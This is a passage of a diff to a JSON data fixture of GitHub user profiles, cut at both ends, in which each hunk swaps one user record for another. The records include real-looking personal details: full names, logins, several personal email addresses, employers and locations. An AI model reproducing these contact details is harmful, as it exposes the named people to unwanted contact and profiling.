"2024-09-04T15:07:32Z", - "node_id": "U_kgDOCrb3iA", + "public_repositories_count": 14, + "created_at": "2017-03-24T18:43:10Z", + "updated_at": "2024-08-21T19:32:40Z", + "node_id": "MDQ6VXNlcjI2NjU5MDE2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439603,24 +700477,24 @@ }, { "model": "github.user", - "pk": 3175, + "pk": 8583, "fields": { - "nest_created_at": "2024-09-12T03:15:41.182Z", - "nest_updated_at": "2024-09-18T19:13:37.970Z", - "name": "Gianluca", - "login": "gianlucapisati", - "email": "gianluca.pisati@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/438602?v=4", - "company": "Vidiemme", - "location": "Milan", + "nest_created_at": "2024-09-22T10:45:26.825Z", + "nest_updated_at": "2024-09-22T20:30:36.493Z", + "name": "Kevin Glavin", + "login": "archen", + "email": "archen.sol@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3520126?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 36, - "created_at": "2010-10-13T22:22:15Z", - "updated_at": "2024-08-29T16:39:39Z", - "node_id": "MDQ6VXNlcjQzODYwMg==", + "following_count": 4, + "followers_count": 14, + "public_gists_count": 3, + "public_repositories_count": 5, + "created_at": "2013-02-09T17:36:29Z", + "updated_at": "2024-09-20T11:28:40Z", + "node_id": "MDQ6VXNlcjM1MjAxMjY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439628,124 +700502,149 @@ }, { "model": "github.user", - "pk": 3176, + "pk": 8584, "fields": { - "nest_created_at": "2024-09-12T03:15:46.153Z", - "nest_updated_at": "2024-09-18T19:13:42.069Z", - "name": "Ryan Morton", - "login": "rynmrtn", + "nest_created_at": "2024-09-22T10:45:27.141Z", + "nest_updated_at": "2024-09-22T20:30:36.840Z", + "name": "0$4M4", + "login": "FinestMaximus", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72798?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/21218173?v=4", "company": "", - "location": "Baltimore, MD", + "location": "London, UK", "collaborators_count": 0, - "following_count": 28, - "followers_count": 27, - "public_gists_count": 37, - "public_repositories_count": 31, - "created_at": "2009-04-11T18:08:38Z", - "updated_at": "2024-04-24T19:02:52Z", - "node_id": "MDQ6VXNlcjcyNzk4", + "following_count": 27, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 27, + "created_at": "2016-08-24T10:46:25Z", + "updated_at": "2024-09-12T12:50:39Z", + "node_id": "MDQ6VXNlcjIxMjE4MTcz", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3177, + "pk": 8585, "fields": { - "nest_created_at": "2024-09-12T03:16:12.079Z", - "nest_updated_at": "2024-09-12T03:16:12.079Z", - "name": "Niels Hofmans", - "login": "hazcod", + "nest_created_at": "2024-09-22T10:45:28.431Z", + "nest_updated_at": "2024-09-22T20:30:38.141Z", + "name": "Luis Toro (@lobuhisec)", + "login": "lobuhi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5222512?v=4", - "company": "ironPeak", - "location": "Belgium", + "avatar_url": "https://avatars.githubusercontent.com/u/37011545?v=4", + "company": "", + "location": "Barcelona, Spain", "collaborators_count": 0, - "following_count": 19, - "followers_count": 131, - "public_gists_count": 60, - "public_repositories_count": 180, - "created_at": "2013-08-13T14:39:48Z", - "updated_at": "2024-08-17T08:51:26Z", - "node_id": "MDQ6VXNlcjUyMjI1MTI=", - "bio": "Hello! I'm a cybersecurity freelancer and an open sourcerer from Belgium.", - "is_hireable": true, + "following_count": 10, + "followers_count": 149, + "public_gists_count": 3, + "public_repositories_count": 30, + "created_at": "2018-03-03T07:11:51Z", + "updated_at": "2024-05-21T07:15:51Z", + "node_id": "MDQ6VXNlcjM3MDExNTQ1", + "bio": "Security Consultant. I do things with kubernetes.", + "is_hireable": false, + "twitter_username": "lobuhisec" + } +}, +{ + "model": "github.user", + "pk": 8586, + "fields": { + "nest_created_at": "2024-09-22T10:45:29.739Z", + "nest_updated_at": "2024-09-22T20:30:39.520Z", + "name": "Daniel Davidson", + "login": "danieldavidson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5460596?v=4", + "company": "", + "location": "Canada", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2013-09-14T22:14:18Z", + "updated_at": "2024-08-12T00:20:06Z", + "node_id": "MDQ6VXNlcjU0NjA1OTY=", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3178, + "pk": 8587, "fields": { - "nest_created_at": "2024-09-12T03:16:12.930Z", - "nest_updated_at": "2024-09-18T19:13:56.337Z", - "name": "Jonathan Hult", - "login": "jhult", + "nest_created_at": "2024-09-22T10:45:30.156Z", + "nest_updated_at": "2024-09-22T20:30:39.831Z", + "name": "", + "login": "niklasbo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9849069?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/47573015?v=4", "company": "", - "location": "Austin, TX", + "location": "Germany", "collaborators_count": 0, - "following_count": 18, - "followers_count": 55, - "public_gists_count": 8, - "public_repositories_count": 124, - "created_at": "2014-11-19T18:28:48Z", - "updated_at": "2024-08-31T14:47:49Z", - "node_id": "MDQ6VXNlcjk4NDkwNjk=", - "bio": "Staff Software Engineer with 13+ years of experience in software engineering, consulting, and pre-sales.", + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2019-02-12T18:14:37Z", + "updated_at": "2024-09-15T16:45:54Z", + "node_id": "MDQ6VXNlcjQ3NTczMDE1", + "bio": "Software / Security Engineer", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3179, + "pk": 8588, "fields": { - "nest_created_at": "2024-09-12T03:16:18.253Z", - "nest_updated_at": "2024-09-12T03:16:18.253Z", - "name": "Philippe Delteil", - "login": "pdelteil", + "nest_created_at": "2024-09-22T10:45:36.726Z", + "nest_updated_at": "2024-09-22T20:30:46.358Z", + "name": "Prakarsh Gupta", + "login": "ptechofficial", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20244863?v=4", - "company": "INFO-SEC", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64535754?v=4", + "company": "Expedia Group", + "location": "NIT Kurukshetra", "collaborators_count": 0, - "following_count": 63, - "followers_count": 223, - "public_gists_count": 30, - "public_repositories_count": 82, - "created_at": "2016-07-01T15:01:32Z", - "updated_at": "2024-08-06T02:32:19Z", - "node_id": "MDQ6VXNlcjIwMjQ0ODYz", - "bio": "Hacker wanna be. ", + "following_count": 28, + "followers_count": 28, + "public_gists_count": 1, + "public_repositories_count": 47, + "created_at": "2020-04-29T12:30:54Z", + "updated_at": "2024-08-31T08:08:47Z", + "node_id": "MDQ6VXNlcjY0NTM1NzU0", + "bio": "GSoC'23 @ OWASP ||\r\nSDE @ Expedia ||\r\nSDE Intern @ DRDO\r\n", "is_hireable": false, - "twitter_username": "philippedelteil" + "twitter_username": "prakkarshh" } }, { "model": "github.user", - "pk": 3180, + "pk": 8589, "fields": { - "nest_created_at": "2024-09-12T03:16:20.775Z", - "nest_updated_at": "2024-09-12T03:16:20.775Z", + "nest_created_at": "2024-09-22T10:45:37.039Z", + "nest_updated_at": "2024-09-22T20:30:46.667Z", "name": "", - "login": "ragunath9293", + "login": "Tamronimus", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75081391?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/48389927?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 5, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-11-26T13:52:23Z", - "updated_at": "2024-08-17T13:44:51Z", - "node_id": "MDQ6VXNlcjc1MDgxMzkx", + "public_repositories_count": 9, + "created_at": "2019-03-09T17:31:24Z", + "updated_at": "2024-09-13T15:42:08Z", + "node_id": "MDQ6VXNlcjQ4Mzg5OTI3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439753,24 +700652,24 @@ }, { "model": "github.user", - "pk": 3181, + "pk": 8590, "fields": { - "nest_created_at": "2024-09-12T03:16:21.619Z", - "nest_updated_at": "2024-09-18T19:14:00.341Z", - "name": "Rafael Cupello", - "login": "cupello", - "email": "rafacupello@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3408672?v=4", - "company": "B2W BIT", - "location": "RJ, Brazil", + "nest_created_at": "2024-09-22T10:45:37.365Z", + "nest_updated_at": "2024-09-22T20:30:46.984Z", + "name": "Jonas Hirner", + "login": "jonashirner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46557373?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 14, - "followers_count": 31, - "public_gists_count": 2, - "public_repositories_count": 131, - "created_at": "2013-01-28T18:12:57Z", - "updated_at": "2024-09-09T21:31:35Z", - "node_id": "MDQ6VXNlcjM0MDg2NzI=", + "following_count": 11, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-01-10T08:40:57Z", + "updated_at": "2024-02-27T14:10:17Z", + "node_id": "MDQ6VXNlcjQ2NTU3Mzcz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439778,74 +700677,74 @@ }, { "model": "github.user", - "pk": 3182, + "pk": 8591, "fields": { - "nest_created_at": "2024-09-12T03:16:32.356Z", - "nest_updated_at": "2024-09-18T19:14:08.168Z", - "name": "James Pudson", - "login": "nepsilon", + "nest_created_at": "2024-09-22T10:45:37.763Z", + "nest_updated_at": "2024-09-22T20:30:47.306Z", + "name": "Hajiahmad Ahmadzada", + "login": "m3t3kh4n", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/600720?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/112255413?v=4", "company": "", - "location": "", + "location": "127.0.0.1", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 106, - "public_repositories_count": 1, - "created_at": "2011-02-04T16:30:21Z", - "updated_at": "2024-08-08T15:16:06Z", - "node_id": "MDQ6VXNlcjYwMDcyMA==", - "bio": "", + "following_count": 17, + "followers_count": 3, + "public_gists_count": 9, + "public_repositories_count": 23, + "created_at": "2022-08-27T12:00:06Z", + "updated_at": "2024-07-22T09:39:41Z", + "node_id": "U_kgDOBrDhtQ", + "bio": "I love hacking, coffee, cheese and beer!", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3183, + "pk": 8592, "fields": { - "nest_created_at": "2024-09-13T03:39:11.798Z", - "nest_updated_at": "2024-09-13T03:39:11.798Z", - "name": "", - "login": "l3ra", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24881613?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:45:38.084Z", + "nest_updated_at": "2024-09-22T20:30:47.639Z", + "name": "Johan Louwers", + "login": "louwersj", + "email": "louwersj@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5837005?v=4", + "company": "Oracle", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 3, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2017-01-02T20:32:33Z", - "updated_at": "2024-07-26T10:41:00Z", - "node_id": "MDQ6VXNlcjI0ODgxNjEz", - "bio": "", - "is_hireable": false, + "following_count": 6, + "followers_count": 9, + "public_gists_count": 36, + "public_repositories_count": 45, + "created_at": "2013-11-02T09:51:24Z", + "updated_at": "2024-09-09T08:58:11Z", + "node_id": "MDQ6VXNlcjU4MzcwMDU=", + "bio": "Johan Louwers is a technology nerd and Open Source enthusiasts. Johan is currently working at Oracle.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3184, + "pk": 8593, "fields": { - "nest_created_at": "2024-09-13T03:39:13.193Z", - "nest_updated_at": "2024-09-18T17:33:24.663Z", - "name": "Aaron Heck", - "login": "ubcaaronheck", + "nest_created_at": "2024-09-22T10:45:38.409Z", + "nest_updated_at": "2024-09-22T20:30:47.960Z", + "name": "John Smith", + "login": "jdsmithit", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38470914?v=4", - "company": "The University of British Columbia", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30145576?v=4", + "company": "Dfds", + "location": "Grimsby", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 29, + "followers_count": 9, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-04-17T16:21:25Z", - "updated_at": "2024-06-12T16:07:49Z", - "node_id": "MDQ6VXNlcjM4NDcwOTE0", + "public_repositories_count": 25, + "created_at": "2017-07-13T09:53:00Z", + "updated_at": "2024-07-02T20:26:05Z", + "node_id": "MDQ6VXNlcjMwMTQ1NTc2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439853,24 +700752,24 @@ }, { "model": "github.user", - "pk": 3185, + "pk": 8594, "fields": { - "nest_created_at": "2024-09-13T03:46:09.091Z", - "nest_updated_at": "2024-09-18T17:40:30.148Z", - "name": "", - "login": "AndrewSilberman", + "nest_created_at": "2024-09-22T10:45:38.726Z", + "nest_updated_at": "2024-09-22T20:30:48.277Z", + "name": "Claud Camerino", + "login": "clazba", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/133234951?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/31473290?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-05-11T13:41:29Z", - "updated_at": "2023-05-11T13:41:29Z", - "node_id": "U_kgDOB_EBBw", + "public_repositories_count": 19, + "created_at": "2017-08-30T10:16:34Z", + "updated_at": "2024-09-05T11:45:22Z", + "node_id": "MDQ6VXNlcjMxNDczMjkw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439878,24 +700777,24 @@ }, { "model": "github.user", - "pk": 3186, + "pk": 8595, "fields": { - "nest_created_at": "2024-09-13T04:14:37.853Z", - "nest_updated_at": "2024-09-18T18:09:22.628Z", - "name": "Artem Nikolaev", - "login": "ArtemNikolaev", + "nest_created_at": "2024-09-22T10:45:39.400Z", + "nest_updated_at": "2024-09-22T20:30:48.913Z", + "name": "Ivar Eriksen", + "login": "ivareri", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4076586?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1616486?v=4", "company": "", - "location": "Minsk, Belarus", + "location": "Trondheim, Norway", "collaborators_count": 0, - "following_count": 9, - "followers_count": 13, - "public_gists_count": 2, - "public_repositories_count": 51, - "created_at": "2013-04-06T10:41:18Z", - "updated_at": "2024-09-13T11:54:48Z", - "node_id": "MDQ6VXNlcjQwNzY1ODY=", + "following_count": 0, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2012-04-05T18:53:15Z", + "updated_at": "2024-08-15T13:12:45Z", + "node_id": "MDQ6VXNlcjE2MTY0ODY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439903,49 +700802,49 @@ }, { "model": "github.user", - "pk": 3187, + "pk": 8596, "fields": { - "nest_created_at": "2024-09-13T04:14:47.072Z", - "nest_updated_at": "2024-09-18T18:09:29.373Z", - "name": "", - "login": "henryshiumusic", + "nest_created_at": "2024-09-22T10:45:39.753Z", + "nest_updated_at": "2024-09-22T20:30:49.227Z", + "name": "Semantic Release Bot", + "login": "semantic-release-bot", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/172324404?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32174276?v=4", + "company": "@semantic-release", + "location": "CI", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 590, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2024-06-10T21:02:58Z", - "updated_at": "2024-06-10T21:03:00Z", - "node_id": "U_kgDOCkV2NA", - "bio": "", + "created_at": "2017-09-21T17:06:24Z", + "updated_at": "2021-11-05T19:19:52Z", + "node_id": "MDQ6VXNlcjMyMTc0Mjc2", + "bio": "helping out my @semantic-release bots", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3188, + "pk": 8597, "fields": { - "nest_created_at": "2024-09-13T04:14:51.377Z", - "nest_updated_at": "2024-09-18T18:09:32.864Z", - "name": "timothy", - "login": "timprivatelysleeps23", + "nest_created_at": "2024-09-22T10:45:40.388Z", + "nest_updated_at": "2024-09-22T20:30:49.887Z", + "name": "Andrew MacLeay", + "login": "amacleay-cohere", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/122581036?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/65668666?v=4", "company": "", - "location": "san diago", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-01-13T01:17:22Z", - "updated_at": "2023-01-22T17:40:18Z", - "node_id": "U_kgDOB05wLA", + "public_repositories_count": 7, + "created_at": "2020-05-20T14:40:04Z", + "updated_at": "2024-08-13T17:49:34Z", + "node_id": "MDQ6VXNlcjY1NjY4NjY2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -439953,49 +700852,49 @@ }, { "model": "github.user", - "pk": 3189, + "pk": 8598, "fields": { - "nest_created_at": "2024-09-13T04:18:04.915Z", - "nest_updated_at": "2024-09-13T04:18:04.915Z", - "name": "M.L.", - "login": "mlcloudsec", + "nest_created_at": "2024-09-22T10:45:40.702Z", + "nest_updated_at": "2024-09-22T20:30:50.200Z", + "name": "", + "login": "james-ahearn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2744135?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/90878468?v=4", "company": "", - "location": "Phoenix, AZ", + "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 13, - "public_repositories_count": 94, - "created_at": "2012-11-07T15:55:55Z", - "updated_at": "2024-09-11T04:07:50Z", - "node_id": "MDQ6VXNlcjI3NDQxMzU=", - "bio": "Cloud, Web and macOS Security.", + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-09-17T00:47:22Z", + "updated_at": "2024-04-15T20:35:10Z", + "node_id": "MDQ6VXNlcjkwODc4NDY4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3190, + "pk": 8599, "fields": { - "nest_created_at": "2024-09-13T04:18:05.594Z", - "nest_updated_at": "2024-09-18T18:12:51.882Z", - "name": "", - "login": "AlphaKiloDelta", + "nest_created_at": "2024-09-22T10:45:41.016Z", + "nest_updated_at": "2024-09-22T20:30:50.511Z", + "name": "dnom", + "login": "dknomura", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68220964?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/14341585?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-07-13T08:46:42Z", - "updated_at": "2023-11-06T08:19:17Z", - "node_id": "MDQ6VXNlcjY4MjIwOTY0", + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2015-09-18T03:44:13Z", + "updated_at": "2024-09-03T11:35:27Z", + "node_id": "MDQ6VXNlcjE0MzQxNTg1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440003,49 +700902,49 @@ }, { "model": "github.user", - "pk": 3191, + "pk": 8600, "fields": { - "nest_created_at": "2024-09-13T04:18:06.605Z", - "nest_updated_at": "2024-09-13T04:18:06.605Z", - "name": "Elvin Gasanov", - "login": "elvin365", + "nest_created_at": "2024-09-22T10:45:41.333Z", + "nest_updated_at": "2024-09-22T20:30:50.834Z", + "name": "Johannes", + "login": "joBr99", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55601311?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/29555657?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 75, - "followers_count": 20, + "following_count": 5, + "followers_count": 61, "public_gists_count": 0, - "public_repositories_count": 102, - "created_at": "2019-09-20T19:03:35Z", - "updated_at": "2024-07-28T21:28:27Z", - "node_id": "MDQ6VXNlcjU1NjAxMzEx", - "bio": "", + "public_repositories_count": 25, + "created_at": "2017-06-19T20:57:54Z", + "updated_at": "2024-09-14T07:05:10Z", + "node_id": "MDQ6VXNlcjI5NTU1NjU3", + "bio": "InfoSec 👨‍💻", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3192, + "pk": 8601, "fields": { - "nest_created_at": "2024-09-13T04:18:06.931Z", - "nest_updated_at": "2024-09-13T04:18:06.931Z", - "name": "Starr Brown", - "login": "mamicidal", + "nest_created_at": "2024-09-22T10:45:41.652Z", + "nest_updated_at": "2024-09-22T20:30:51.147Z", + "name": "@m1ru1", + "login": "am1ru1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/112129498?v=4", - "company": "OWASP", + "avatar_url": "https://avatars.githubusercontent.com/u/4379186?v=4", + "company": "InfoSec", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-08-25T21:31:03Z", - "updated_at": "2024-08-27T13:32:39Z", - "node_id": "U_kgDOBq712g", + "following_count": 35, + "followers_count": 18, + "public_gists_count": 16, + "public_repositories_count": 92, + "created_at": "2013-05-08T16:57:11Z", + "updated_at": "2024-08-27T11:26:19Z", + "node_id": "MDQ6VXNlcjQzNzkxODY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440053,49 +700952,49 @@ }, { "model": "github.user", - "pk": 3193, + "pk": 8602, "fields": { - "nest_created_at": "2024-09-13T04:19:08.365Z", - "nest_updated_at": "2024-09-18T18:13:53.091Z", - "name": "Albert T. Wong", - "login": "alberttwong", - "email": "atwong@alumni.uci.edu", - "avatar_url": "https://avatars.githubusercontent.com/u/749093?v=4", - "company": "Onehouse.ai", - "location": "Los Angeles, CA, USA", + "nest_created_at": "2024-09-22T10:45:41.966Z", + "nest_updated_at": "2024-09-22T20:30:51.465Z", + "name": "Andre Baumeier", + "login": "AndreBaumeier", + "email": "hallo@andre-baumeier.de", + "avatar_url": "https://avatars.githubusercontent.com/u/906385?v=4", + "company": "", + "location": "Germany, Austria, somewhere", "collaborators_count": 0, - "following_count": 9, - "followers_count": 48, - "public_gists_count": 4, - "public_repositories_count": 112, - "created_at": "2011-04-24T18:29:12Z", - "updated_at": "2024-09-09T22:19:36Z", - "node_id": "MDQ6VXNlcjc0OTA5Mw==", - "bio": "#eCommerce #Java #Database #k8s #Automation. Hobbies: #BoardGames #Comics #Skeet #VideoGames #Pinball #Magic #YelpElite #Travel #Candy #RoadBiking", + "following_count": 17, + "followers_count": 7, + "public_gists_count": 8, + "public_repositories_count": 19, + "created_at": "2011-07-10T19:14:50Z", + "updated_at": "2024-08-28T11:22:11Z", + "node_id": "MDQ6VXNlcjkwNjM4NQ==", + "bio": "", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3194, + "pk": 8603, "fields": { - "nest_created_at": "2024-09-13T04:19:25.733Z", - "nest_updated_at": "2024-09-18T18:14:09.646Z", - "name": "", - "login": "whydee86", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43274863?v=4", + "nest_created_at": "2024-09-22T10:45:42.280Z", + "nest_updated_at": "2024-09-22T20:30:51.776Z", + "name": "Ben Joyce", + "login": "benjoyce", + "email": "ben.joyce@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2352909?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 86, + "following_count": 5, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 24, - "created_at": "2018-09-14T15:01:41Z", - "updated_at": "2024-06-09T12:26:28Z", - "node_id": "MDQ6VXNlcjQzMjc0ODYz", + "public_repositories_count": 7, + "created_at": "2012-09-15T15:25:08Z", + "updated_at": "2024-09-11T14:13:16Z", + "node_id": "MDQ6VXNlcjIzNTI5MDk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440103,49 +701002,49 @@ }, { "model": "github.user", - "pk": 3195, + "pk": 8604, "fields": { - "nest_created_at": "2024-09-13T04:19:26.404Z", - "nest_updated_at": "2024-09-13T04:19:26.404Z", - "name": "bedef", - "login": "fedeb95", - "email": "federico.bonfiglio@protonmail.ch", - "avatar_url": "https://avatars.githubusercontent.com/u/25415908?v=4", + "nest_created_at": "2024-09-22T10:45:42.592Z", + "nest_updated_at": "2024-09-22T20:30:52.101Z", + "name": "Bernard Vander Beken", + "login": "jawn", + "email": "bernard@jawn.net", + "avatar_url": "https://avatars.githubusercontent.com/u/1705112?v=4", "company": "", - "location": "", + "location": "Belgium", "collaborators_count": 0, - "following_count": 5, - "followers_count": 5, - "public_gists_count": 1, - "public_repositories_count": 42, - "created_at": "2017-01-29T13:05:59Z", - "updated_at": "2024-09-02T09:07:40Z", - "node_id": "MDQ6VXNlcjI1NDE1OTA4", - "bio": "Programmer", + "following_count": 20, + "followers_count": 39, + "public_gists_count": 14, + "public_repositories_count": 184, + "created_at": "2012-05-04T08:19:17Z", + "updated_at": "2024-09-05T20:54:06Z", + "node_id": "MDQ6VXNlcjE3MDUxMTI=", + "bio": "(Un)learning software development, collaboration, yoga and life.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3196, + "pk": 8605, "fields": { - "nest_created_at": "2024-09-13T04:55:54.148Z", - "nest_updated_at": "2024-09-18T18:22:25.261Z", - "name": "", - "login": "KnightYoshi", + "nest_created_at": "2024-09-22T10:45:43.267Z", + "nest_updated_at": "2024-09-22T20:30:52.724Z", + "name": "Dustyn Tubbs", + "login": "MagnificRogue", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6134576?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7548646?v=4", + "company": "Microsoft", + "location": "Seattle", "collaborators_count": 0, - "following_count": 6, - "followers_count": 5, - "public_gists_count": 3, - "public_repositories_count": 3, - "created_at": "2013-12-08T09:42:10Z", - "updated_at": "2024-07-20T03:29:55Z", - "node_id": "MDQ6VXNlcjYxMzQ1NzY=", + "following_count": 5, + "followers_count": 10, + "public_gists_count": 2, + "public_repositories_count": 48, + "created_at": "2014-05-11T12:19:12Z", + "updated_at": "2024-04-27T16:58:04Z", + "node_id": "MDQ6VXNlcjc1NDg2NDY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -440153,74 +701052,74 @@ }, { "model": "github.user", - "pk": 3197, + "pk": 8606, "fields": { - "nest_created_at": "2024-09-13T04:56:23.153Z", - "nest_updated_at": "2024-09-18T18:22:54.727Z", - "name": "Ali-Akber Saifee", - "login": "alisaifee", - "email": "ali@indydevs.org", - "avatar_url": "https://avatars.githubusercontent.com/u/79842?v=4", - "company": "@indydevs ", - "location": "Burnaby, British Columbia", + "nest_created_at": "2024-09-22T10:45:43.612Z", + "nest_updated_at": "2024-09-22T20:30:53.031Z", + "name": "Elvis Fernandes", + "login": "elvisfernandes", + "email": "elvis@elvis.eti.br", + "avatar_url": "https://avatars.githubusercontent.com/u/59369?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 75, - "public_gists_count": 11, - "public_repositories_count": 51, - "created_at": "2009-05-01T06:15:48Z", - "updated_at": "2024-03-09T20:30:27Z", - "node_id": "MDQ6VXNlcjc5ODQy", + "following_count": 7, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 50, + "created_at": "2009-03-02T13:45:31Z", + "updated_at": "2024-09-19T20:08:15Z", + "node_id": "MDQ6VXNlcjU5MzY5", "bio": "", "is_hireable": false, - "twitter_username": "alisaifee" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3198, + "pk": 8607, "fields": { - "nest_created_at": "2024-09-13T05:02:25.853Z", - "nest_updated_at": "2024-09-18T19:13:08.188Z", - "name": "", - "login": "chhajershrenik", + "nest_created_at": "2024-09-22T10:45:43.931Z", + "nest_updated_at": "2024-09-22T20:30:53.346Z", + "name": "Fredrik Fall", + "login": "shorinji", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57632527?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27412?v=4", + "company": "Sentor", + "location": "Sweden", "collaborators_count": 0, - "following_count": 34, + "following_count": 0, "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 235, - "created_at": "2019-11-11T15:34:54Z", - "updated_at": "2024-08-24T21:43:48Z", - "node_id": "MDQ6VXNlcjU3NjMyNTI3", - "bio": "", + "public_gists_count": 11, + "public_repositories_count": 17, + "created_at": "2008-10-03T13:28:09Z", + "updated_at": "2024-04-25T07:06:37Z", + "node_id": "MDQ6VXNlcjI3NDEy", + "bio": "DevSecOps guy", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3199, + "pk": 8608, "fields": { - "nest_created_at": "2024-09-13T05:04:46.670Z", - "nest_updated_at": "2024-09-13T16:27:26.811Z", - "name": "", - "login": "anakin1", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24998343?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:45:44.280Z", + "nest_updated_at": "2024-09-22T20:30:53.667Z", + "name": "Jack Coleman", + "login": "JackColeman", + "email": "jack.coleman@lexisnexisrisk.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5939736?v=4", + "company": "LexisNexis Risk Solutions", + "location": 